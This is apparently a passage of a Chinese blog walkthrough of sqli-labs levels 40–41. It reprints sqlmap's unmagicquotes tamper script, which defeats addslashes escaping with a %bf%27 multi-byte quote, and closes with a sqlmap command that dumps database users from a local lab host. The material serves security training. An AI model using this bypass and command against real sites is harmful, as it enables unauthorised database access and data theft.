首先，之前忘了说 unmagicquotes.py 的写法了，不然真成了为了使用脚本而使用脚本了...
#!/usr/bin/env python
"""
Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.compat import xrange
from lib.core.enums import PRIORITY
# Ordering hint for the tamper loader when several tamper scripts are chained;
# the value comes from the PRIORITY enum (exact tiers are defined in lib.core.enums — confirm there)
__priority__ = PRIORITY.NORMAL
def dependencies():
    """Declare external requirements for this tamper script (none; no-op)."""
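def tamper(payload, **kwargs):
    """
    Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)

    Notes:
        * Useful for bypassing magic_quotes/addslashes feature

    Reference:
        * http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string

    Args:
        payload: the original payload string (may be empty or None, in which case it is returned unchanged)
        **kwargs: accepted for interface compatibility with other tamper scripts; unused here

    Returns:
        The transformed payload; only the first quote is replaced, the rest of the
        string is kept verbatim, and a trailing "-- -" comment is appended unless the
        payload already carries a comment marker ('#', '--' or '/*').

    >>> tamper("1' AND 1=1")
    '1%bf%27-- -'
    """
    retVal = payload

    # Nothing to do for an empty payload or one without a quote: return it untouched
    if payload and "'" in payload:
        # Replace only the first quote; this replaces the previous index loop with
        # str.replace(count=1), which has identical behaviour without xrange/+= building
        retVal = payload.replace("'", "%bf%27", 1)

        # Strip a tautology of the form " AND x=x" / " OR x LIKE x" that follows the
        # injected quote; if something was stripped, terminate the statement with a comment
        stripped = re.sub(r"(?i)\s*(AND|OR)[\s(]+([^\s]+)\s*(=|LIKE)\s*\2", "", retVal)
        if stripped != retVal:
            retVal = stripped + "-- -"
        # Otherwise append the comment only when no comment marker is already present
        elif not any(marker in retVal for marker in ('#', '--', '/*')):
            retVal += "-- -"

    return retVal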
可以看到逻辑很简单，就是检测、分割并添加 %bf%27。
Less-41
![](https://img-blog.csdnimg.cn/7a7c67bbac5d4738af1da87facd141b0.png)
这关也是无报错，其余和 40 关一样，直接跑就好了。
python3 ./sqlmap.py "http://192.168.0.101/2022.10.26/sqli-labs-master/Less-41/?id=1" --technique=U --users --tamper=air.py --level=2